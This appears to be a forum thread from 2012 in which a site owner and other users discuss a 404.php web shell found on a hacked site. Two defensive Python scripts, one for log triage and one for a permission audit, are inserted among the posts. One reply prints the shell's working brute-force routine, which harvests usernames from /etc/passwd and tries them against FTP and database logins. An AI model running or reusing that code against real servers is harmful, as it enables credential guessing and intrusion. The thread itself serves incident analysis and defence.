Site Hacked With 404.php Shell - More Info?


Post by olimits7 on Thu Oct 04, 2012 3:58 pm

Hi,

My website was hacked using the following 404.php shell file, which I found uploaded to my site. I checked my logs and I can see that the point of entry was through http and not ftp or ssh.

http://pastebin.com/pXACCsW4

I'm new to this whole area, and I'm just trying to learn more about it and also how to protect myself better.

I see in the http log file there are a bunch of "GET" lines, but then all of a sudden I can see a "POST" line show up showing the upload of the 404.php file. I'm trying to find out how exactly this hacker was able to post this file to my site.

The only entry points I can think of are that I have Kayako Live Chat on my website; could this file be injected through this Live Chat feature? Or I also have a WordPress blog on my site; could this file have been injected via posting comments or trackbacks on the blog?

Thank you!


Re: Site Hacked With 404.php Shell - More Info?

Post by limdis on Thu Oct 04, 2012 4:01 pm

Wow that's a lot of code. Give us some time to go over it.
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."


Re: Site Hacked With 404.php Shell - More Info?

Post by olimits7 on Thu Oct 04, 2012 4:07 pm

I ended up uploading it back to my site and changed the md5 hashed password to something else, and it basically loads a "windows explorer" type page which gives the hacker full site to the server.

I am impressed by the creator of this shell script, but upset that I had to experience the attack first hand! So this is why I'm trying to figure out what entry points or how this hacker could have gotten this file on my server to begin with.

Thanks!


Re: Site Hacked With 404.php Shell - More Info?

Post by centip3de on Thu Oct 04, 2012 6:14 pm

olimits7 wrote: Hi,

My website was hacked using the following 404.php shell file, which I found uploaded to my site. I checked my logs and I can see that the point of entry was through http and not ftp or ssh.

http://pastebin.com/pXACCsW4

I'm new to this whole area, and I'm just trying to learn more about it and also how to protect myself better.

I see in the http log file there are a bunch of "GET" lines, but then all of a sudden I can see a "POST" line show up showing the upload of the 404.php file. I'm trying to find out how exactly this hacker was able to post this file to my site.

The only entry points I can think of are that I have Kayako Live Chat on my website; could this file be injected through this Live Chat feature? Or I also have a WordPress blog on my site; could this file have been injected via posting comments or trackbacks on the blog?

Thank you!


No, I'm pretty sure your server just got brute-forced. I'm assuming that's what all the GET lines are, and why this function exists in the posted code:

Code:
function actionBruteforce() {
    printHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
                $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="komsen"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo '</div><br>';
    printFooter();
}


Then once he gained access, it looks like he uploaded this script to your server, and was able to open a backdoor, of sorts (which is why 90% of that code is just normal shell commands).
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook


Re: Site Hacked With 404.php Shell - More Info?

Post by olimits7 on Thu Oct 04, 2012 6:21 pm

Thank you for your reply!

Probably mid-September, my WordPress blog site got hit hard where I noticed a bunch of trackback links being posted and comments. At that time, I had comments set to "automatically" be approved. As soon as I saw this, I changed my blog settings to have each comment be approved and to stop linking to trackbacks, but I'm guessing I was too late at this point.

How exactly does a brute-force attack work, where by using "GET" they are able to upload the 404.php file to my site?

Could this be done through Kayako Live Chat or through Wordpress comments/trackback links?

Thank you, again!


Re: Site Hacked With 404.php Shell - More Info?

Post by LoGiCaL__ on Thu Oct 04, 2012 9:17 pm

I think you would be better off posting the log. Just take out ip addresses or any identifying info.


Re: Site Hacked With 404.php Shell - More Info?

Post by limdis on Thu Oct 04, 2012 9:20 pm

LoGiCaL__ wrote: I think you would be better off posting the log. Just take out ip addresses or any identifying info.

This. Weekend and I looked at this for a little while and what we found was interesting. But we'll need logs to confirm our suspicions.


Re: Site Hacked With 404.php Shell - More Info?

Post by centip3de on Thu Oct 04, 2012 11:39 pm

olimits7 wrote: How exactly does a brute-force attack work, where by using "GET" they are able to upload the 404.php file to my site?


A brute-force attack is where someone tries every single password combination there is (from a-AAAAAAAAAAAAA), one after another. By doing this, they are able to crack your password without knowing it. However, the downfall to this attack is that it is very, very, VERY time-consuming and takes a lot of tries (what I'm assuming all the GET requests were). The POST request could be a number of things, but I'm assuming that it's the server allowing him in. From the server, he probably downloaded his script via FTP onto your server, and there it lay.

Or, the POST command somehow enabled him to download the file onto your server via FTP (or another protocol) and he then busted in through there.

olimits7 wrote: Could this be done through Kayako Live Chat or through Wordpress comments/trackback links?
Thank you, again!


No. This can only be done through something that accepts a user/pass combination, such as a login. And, because he was able to get something onto your server, I'm assuming that it was the login to your server (also most likely why there are port scanning functions in the script).
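A way to do the log triage the replies above keep asking for, as an added example that is not from the thread or any of its posters: it parses combined-format access log lines, ranks clients by GET volume (a lone outlier is what a login brute-force looks like in the log), finds the first request for the dropped file, and lists the POSTs the same client sent before that moment. The log lines are constructed, with documentation-range IPs and a made-up plugin path, so the script runs offline.

```python
"""Access-log triage for the "GET burst, then POST" pattern discussed above.

Added example, not code from the thread. The log lines are constructed:
the IPs come from documentation ranges and the plugin path is made up.
"""
import re
from collections import Counter

# Apache/nginx "combined" format:
#   ip ident authuser [time] "METHOD path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (not a real capture).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Oct/2012:09:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Oct/2012:09:00:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Oct/2012:09:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Oct/2012:09:00:04 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Oct/2012:09:01:00 +0000] "POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Oct/2012:09:01:05 +0000] "GET /wp-content/uploads/404.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def parse_log(text):
    """Return one dict per line that matches the combined format; skip the rest."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            entries.append(entry)
    return entries


def request_counts(entries, method="GET"):
    """Requests per client for one method; a lone outlier is the brute-force signature."""
    return Counter(e["ip"] for e in entries if e["method"] == method)


def busy_clients(entries, threshold, method="GET"):
    """Clients whose count for `method` reaches `threshold`, busiest first."""
    counts = request_counts(entries, method)
    return [ip for ip, n in counts.most_common() if n >= threshold]


def first_reference(entries, filename):
    """First request whose path mentions the dropped file, or None."""
    for e in entries:
        if filename in e["path"]:
            return e
    return None


def upload_candidates(entries, filename):
    """POSTs from the same client that precede its first request for `filename`.

    The request that actually wrote the file is normally among these, and its
    path names the component (plugin, chat widget, upload handler) that took it.
    """
    hit = first_reference(entries, filename)
    if hit is None:
        return []
    candidates = []
    for e in entries:
        if e is hit:
            break
        if e["ip"] == hit["ip"] and e["method"] == "POST":
            candidates.append(e)
    return candidates


def triage(text, filename="404.php", threshold=3):
    """Bundle the three checks into one report."""
    entries = parse_log(text)
    hit = first_reference(entries, filename)
    return {
        "parsed": len(entries),
        "busy_clients": busy_clients(entries, threshold),
        "first_seen": hit["time"] if hit else None,
        "upload_candidates": [e["path"] for e in upload_candidates(entries, filename)],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LOG), indent=2))
```

Against a real file, `triage(open("access.log").read())` gives the same report; the threshold is a tuning knob, since a handful of GETs to a login page is normal and hundreds from one address in a minute is not. The interesting field is `upload_candidates`: the path of the POST that landed just before the first hit on 404.php is the component that needs patching or removing, which is the answer the thread is trying to reach.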


Re: Site Hacked With 404.php Shell - More Info?

Post by weekend hacker on Fri Oct 05, 2012 4:50 pm

centip3de wrote: No. This can only be done through something that accepts a user/pass combination, such as a login. And, because he was able to get something onto your server, I'm assuming that it was the login to your server (also most likely why there are port scanning functions in the script).

Although Wordpress makes it easy to update there could be some vuln plugin or some other web angle that wouldn't require a password.
And with shared hosting you could have set bad modes on your directories, allowing anyone else with an account to write to it. (Really though, what kind of hosting doesn't at least pretend to prevent this?) There are so many potential ways to get in it's nearly impossible to tell without those logs and more information.

As for the backdoor itself, I'm assuming that paste wasn't the one used on your machine but something you googled?
The reason I think this is because the paste ID is the exact same one as the one used in the blog post of the site mentioned in that shell. (password: HACKED)
And version 2.5 of that shell looks prettier (and Windows support/Windows only?)

EDIT: by the top part I mean maybe it wasn't brute force but an actual exploit in one of the many 3rd party things you probably use.
<Yoda> if someone says something i don't like, i ban him, ban whoever defends him, and then ban the witnesses...
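The shared-hosting permissions point above, as an added example that is not from the thread: a small audit that walks a web root, lists world-writable directories and files, and flags PHP scripts sitting in a world-writable directory, which is the usual resting place of a dropped shell. It builds a throwaway tree under a temp directory so it runs offline; the `wp-content/uploads/404.php` placeholder inside it is constructed and is not the file from the thread.

```python
"""Permission audit for a web root on shared hosting.

Added example, not code from the thread. The demo tree it builds is
constructed; the 404.php inside it is a one-line placeholder.
"""
import os
import stat
import tempfile

SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")


def world_writable(path):
    """True when the 'other' write bit is set on the entry itself."""
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def audit_tree(root):
    """Walk `root` and collect the three findings a hosting review cares about."""
    findings = {
        "world_writable_dirs": [],
        "world_writable_files": [],
        "scripts_in_writable_dirs": [],
    }
    for dirpath, _dirnames, filenames in os.walk(root):
        dir_open = world_writable(dirpath)
        if dir_open:
            findings["world_writable_dirs"].append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # judge the link target where it lives, not here
            if world_writable(path):
                findings["world_writable_files"].append(path)
            # Any other local account can drop or replace a script here.
            if dir_open and name.lower().endswith(SCRIPT_EXTS):
                findings["scripts_in_writable_dirs"].append(path)
    for key in findings:
        findings[key].sort()
    return findings


def build_demo_tree():
    """Constructed web root: a sane top level and a wide-open uploads directory."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    os.chmod(root, 0o755)
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    os.chmod(os.path.join(root, "wp-content"), 0o755)
    os.chmod(uploads, 0o777)  # the bad mode weekend hacker describes
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello';\n")
    with open(os.path.join(uploads, "404.php"), "w") as f:
        f.write("<?php // constructed placeholder, not the shell from the thread\n")
    with open(os.path.join(uploads, "photo.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff")  # JPEG magic bytes only
    os.chmod(os.path.join(root, "index.php"), 0o644)
    os.chmod(os.path.join(uploads, "404.php"), 0o644)
    os.chmod(os.path.join(uploads, "photo.jpg"), 0o666)  # world-writable data file
    return root


def demo_findings():
    """Build the demo tree, audit it and return findings relative to the root."""
    root = build_demo_tree()
    findings = audit_tree(root)
    return {k: [os.path.relpath(p, root) for p in v] for k, v in findings.items()}


if __name__ == "__main__":
    for key, paths in demo_findings().items():
        print(key)
        for p in paths:
            print("  ", p)
```

On a live host the same first pass is `find /path/to/webroot -perm -o=w`; the script adds the distinction that matters for this thread, namely a script file inside a directory that another tenant can write to, rather than just a list of modes. Upload directories should not be world-writable, and the web server should not execute scripts from them at all.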


Re: Site Hacked With 404.php Shell - More Info?

Post by centip3de on Sat Oct 06, 2012 4:51 pm

weekend hacker wrote: Although Wordpress makes it easy to update there could be some vuln plugin or some other web angle that wouldn't require a password.
And with shared hosting you could have set bad modes on your directories, allowing anyone else with an account to write to it. (Really though, what kind of hosting doesn't at least pretend to prevent this?) There are so many potential ways to get in it's nearly impossible to tell without those logs and more information.


I'd be really interested in a bruteforce attack that didn't require a user/pass combination, personally. ;)


